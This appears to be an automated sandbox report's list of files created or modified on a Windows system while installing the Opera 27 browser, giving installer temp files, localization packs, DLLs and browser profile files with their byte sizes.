%Program Files% (x86)\Opera\Assets\70x70Logo.scale-100.png (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\el.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\bg.pak (673 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\lt.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fr.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-140_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fi.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\uk.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\gd.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\pdf.dll (71155 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\installer.exe (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.log (23904 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\Df6Dtkv9LPdV.exe (5261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fi.pak (126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\uk.pak (207 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sv.pak (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\lv.pak (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\license.txt (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\nn.pak (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_200_percent.pak (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fr.pak (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\hi.pak (254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\ffmpegsumo.dll (992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\me.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Resources.pri (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\launcher.exe (487 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\zh-TW.pak (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\win8_importing.dll (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\launcher.visualelementsmanifest.xml (318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\th.pak (250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ca.pak (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_150_percent.pak (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\dictionaries.xml (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-80.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3BB9C1BA2D19E090AE305B2683903A0_6E9A9670139B949E0946278E14EB2FC8 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\zh-CN.pak (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\be.pak (182 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_autoupdate.version (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_autoupdate.licenses (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\server_tracking_data (489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\root_files_list (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pa.pak (237 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_250_percent.pak (917 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-140_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\zu.pak (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pl.pak (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-140.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\wow_helper.exe (73 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera.exe (65075 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\de.pak (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\pdf.dll (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ko.pak (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\nb.pak (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E4F76C0C82655FD6506668127FA0ACD1_F6AB1C86FB0C74897AC7F2CB403CFB96 (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\el.pak (216 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_crashreporter.exe (552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\nl.pak (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ro.pak (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-100.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.7z (27684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\libEGL.dll (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\mk.pak (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\icudtl.dat (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-180.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\d3dcompiler_46.dll (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\tr.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\da.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fr-CA.pak (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\es.pak (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\hr.pak (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\uz.pak (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\az.pak (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\en-US.pak (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fil.pak (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\af.pak (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\files_list (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera.pak (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\bn.pak (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\en-GB.pak (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\libGLESv2.dll (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ja.pak (160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-140.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E4F76C0C82655FD6506668127FA0ACD1_F6AB1C86FB0C74897AC7F2CB403CFB96 (1640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pt-PT.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ms.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-80_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\osmesa.dll (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_100_percent.pak (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\it.pak (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\te.pak (274 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\lt.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_autoupdate.exe (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3BB9C1BA2D19E090AE305B2683903A0_6E9A9670139B949E0946278E14EB2FC8 (1536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fy.pak (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\bg.pak (194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-180_contrast-white.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\message_center_win8.dll (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-180.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_125_percent.pak (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-100.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\kk.pak (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ta.pak (296 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pt-BR.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\vi.pak (147 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\msvcr100.dll (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sr.pak (188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\es-419.pak (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\msvcp100.dll (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ru.pak (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sw.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sk.pak (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\cs.pak (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\default_partner_content.json (258 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\8D41.tmp (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\gd.pak (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.exe (16260652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\launcher_lib.dll (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\id.pak (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\hu.pak (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera.dll (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-80.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Opera_27.0.1689.69_Setup[1].exe (15995994 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6831.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_go.mail.ru_0.localstorage (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\000F7F8FAB2D96E6F8CBD5C9A3B4EC90 (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Bookmarks.bak (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\History-journal (3084 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000005.ldb (238 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4463.tmp (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\thumbnails.db-journal (23128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4466.tmp (3906 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DS2ZTCIE4KNSH4V607JD.temp (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\685B.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\943E.tmp (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\444F.tmp (752 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1F4BA66CDBFEC85A20E11BF729AF23_875737CF3E2CD0CAED4F83BDCD5EF412 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.db (2112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_kQsciBiKuEIL842 (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\LOG (236 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Cookies (9254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\index (368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_Sp9QxhhjcY7lZWN (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1F4BA66CDBFEC85A20E11BF729AF23_875737CF3E2CD0CAED4F83BDCD5EF412 (1536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000010 (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\000004.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000004.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Favicons (9026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Web Data (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\000F7F8FAB2D96E6F8CBD5C9A3B4EC90 (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4464.tmp (10174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\MANIFEST-000004 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000e (45 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000d (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\MANIFEST-000004 (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000f (55 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000a (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000c (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_00000b (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_3 (5992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_2 (6344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_1 (167256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\data_0 (620200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\History Provider Cache (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4460.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\6284.tmp (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000004 (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\LOG (470 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6843.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Web Data-journal (5450 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\6235.tmp (24 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6845.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4465.tmp (4482 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6859.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000006 (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_go.mail.ru_0.localstorage-journal (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\MANIFEST-000004 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.db-journal (5739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Favicons-journal (37748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\old_Cache_000 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_pi86MUhJVCxtBpT (19820 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\http_s7.addthis.com_0.localstorage-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000005 (30 bytes)
